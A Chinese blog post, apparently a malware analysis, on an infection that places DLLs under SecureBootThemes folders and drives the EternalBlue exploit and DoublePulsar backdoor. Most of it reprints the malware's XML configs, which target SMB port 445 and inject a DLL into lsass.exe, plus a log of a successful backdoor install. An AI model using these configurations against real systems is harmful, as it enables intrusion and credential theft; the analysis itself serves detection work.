该博客详细介绍了勒索病毒如何利用tpmagentservice.dll和TrustedHostServeces.exe这两个组件,通过svchost.exe和spoolsv.exe系统进程进行恶意注入。病毒活动主要集中在C:windowsSecureBootThemesMicrosoft及C:windowsSystem32SecureBootThemes目录下,并创建svchost.xml和spoolsv.xml配置文件,以及stage2.txt日志文件。
有大约56个DLL文件。通过svchost.exe和spoolsv.exe,注入到系统进程。
会在
C:\windows\SecureBootThemes\Microsoft
C:\windows\System32\SecureBootThemes
俩文件夹下面。
通常有两个配置文件。svchost.xml和spoolsv.xml,日志文件为stage2.txt
这是第一个svchost.xml
<t:config xmlns:t="urn:trch" id="0f38f55b6a88feccfb846d3d10ab4687e652e63e" configversion="2.2.0.0" name="Eternalblue" version="2.2.0" schemaversion="2.1.0">
<t:inputparameters>
<t:parameter name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port" type="TcpPort" format="Scalar" hidden="true" valid="true">
<t:default>0</t:default>
<t:value>0</t:value>
</t:parameter>
<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<t:default>60</t:default>
<t:value>60</t:value>
</t:parameter>
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<t:value>%s</t:value>
</t:parameter>
<t:parameter name="TargetPort" description="Port used by the SMB service for exploit connection" type="TcpPort" format="Scalar" valid="true">
<t:default>445</t:default>
<t:value>445</t:value>
</t:parameter>
<t:parameter name="VerifyTarget" description="Validate the SMB string from target against the target selected before exploitation." type="Boolean" format="Scalar" valid="true">
<t:default>true</t:default>
<t:value>true</t:value>
</t:parameter>
<t:parameter name="VerifyBackdoor" description="Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts." type="Boolean" format="Scalar" valid="true">
<t:default>true</t:default>
<t:value>true</t:value>
</t:parameter>
<t:parameter name="MaxExploitAttempts" description="Number of times to attempt the exploit and groom. Disabled for XP/2K3." type="U32" format="Scalar" valid="true">
<t:default>3</t:default>
<t:value>3</t:value>
</t:parameter>
<t:parameter name="GroomAllocations" description="Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do." type="U32" format="Scalar" valid="true">
<t:default>12</t:default>
<t:value>12</t:value>
</t:parameter>
<t:parameter name="ShellcodeBuffer" description="Shellcode buffer in hex (hint: use 'F:<FILENAME>' to load from file)" type="Buffer" format="Scalar" hidden="true" required="false"></t:parameter>
<t:paramchoice name="Target" description="Operating System, Service Pack, and Architecture of target OS">
<t:value>WIN72K8R2</t:value>
<t:paramgroup name="XP" description="Windows XP 32-Bit All Service Packs"></t:paramgroup>
<t:paramgroup name="WIN72K8R2" description="Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs"></t:paramgroup>
</t:paramchoice>
</t:inputparameters>
<t:outputparameters>
<t:parameter name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" type="Boolean" format="Scalar"></t:parameter>
</t:outputparameters>
</t:config>
<t:config xmlns:t="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">
<t:inputparameters>
<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<t:default>60</t:default>
<t:value>60</t:value>
</t:parameter>
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<t:value>%s</t:value>
</t:parameter>
<t:parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">
<t:default>445</t:default>
<t:value>445</t:value>
</t:parameter>
<t:paramchoice name="Protocol" description="Protocol for the backdoor to speak">
<t:default>SMB</t:default>
<t:value>SMB</t:value>
<t:paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></t:paramgroup>
<t:paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></t:paramgroup>
</t:paramchoice>
<t:paramchoice name="Architecture" description="Architecture of the target OS">
<t:default>x64</t:default>
<t:value>x64</t:value>
<t:paramgroup name="x86" description="x86 32-bits"></t:paramgroup>
<t:paramgroup name="x64" description="x64 64-bits"></t:paramgroup>
</t:paramchoice>
<t:paramchoice name="Function" description="Operation for backdoor to perform">
<t:default>OutputInstall</t:default>
<t:value>RunDLL</t:value>
<t:paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">
<t:parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="Ping" description="Test for presence of backdoor"></t:paramgroup>
<t:paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">
<t:parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">
<t:value>%s</t:value>
</t:parameter>
<t:parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">
<t:default>0</t:default>
<t:value>1</t:value>
</t:parameter>
<t:parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">
<t:default>lsass.exe</t:default>
<t:value>lsass.exe</t:value>
</t:parameter>
<t:parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">
<t:default></t:default>
<t:value></t:value>
</t:parameter>
</t:paramgroup>
<t:paramgroup name="RunShellcode" description="Run raw shellcode">
<t:parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></t:parameter>
<t:parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="Uninstall" description="Remove's backdoor from system"></t:paramgroup>
</t:paramchoice>
</t:inputparameters>
<t:outputparameters>
<t:paramchoice name="Function" description="Operation for backdoor to perform">
<t:paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">
<t:parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></t:parameter>
<t:parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="Ping" description="Test for presence of backdoor">
<t:parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">
<t:parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="Uninstall" description="Remove's backdoor from system">
<t:parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></t:parameter>
</t:paramgroup>
</t:paramchoice>
</t:outputparameters>
</t:config>
日志文件。
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x9B2F0DCD
SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1
Target OS is: 7 x86
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">
<inputparameters>
<parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<default>60</default>
<value>60</value>
</parameter>
<parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<value>192.168.1.81</value>
</parameter>
<parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">
<default>445</default>
<value>445</value>
</parameter>
<parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>
<parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">
<default>stdout</default>
<value>stdout</value>
</parameter>
<parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">
<default>false</default>
<value>false</value>
</parameter>
<paramchoice name="Protocol" description="Protocol for the backdoor to speak">
<default>SMB</default>
<value>SMB</value>
<paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>
<paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>
</paramchoice>
<paramchoice name="Architecture" description="Architecture of the target OS">
<default>x64</default>
<value>x64</value>
<paramgroup name="x86" description="x86 32-bits"></paramgroup>
<paramgroup name="x64" description="x64 64-bits"></paramgroup>
</paramchoice>
<paramchoice name="Function" description="Operation for backdoor to perform">
<default>OutputInstall</default>
<value>RunDLL</value>
<paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">
<parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>
<paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">
<parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">
<value>C:\Windows\SecureBootThemes\Microsoft\\x86.dll</value>
</parameter>
<parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">
<default>0</default>
<value>1</value>
</parameter>
<parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">
<default>lsass.exe</default>
<value>lsass.exe</value>
</parameter>
<parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
</paramgroup>
<paramgroup name="RunShellcode" description="Run raw shellcode">
<parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>
<parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>
</paramchoice>
</inputparameters>
<outputparameters>
<paramchoice name="Function" description="Operation for backdoor to perform">
<paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">
<parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>
<parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Ping" description="Test for presence of backdoor">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Uninstall" description="Remove's backdoor from system">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
</paramchoice>
</outputparameters>
</config>
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
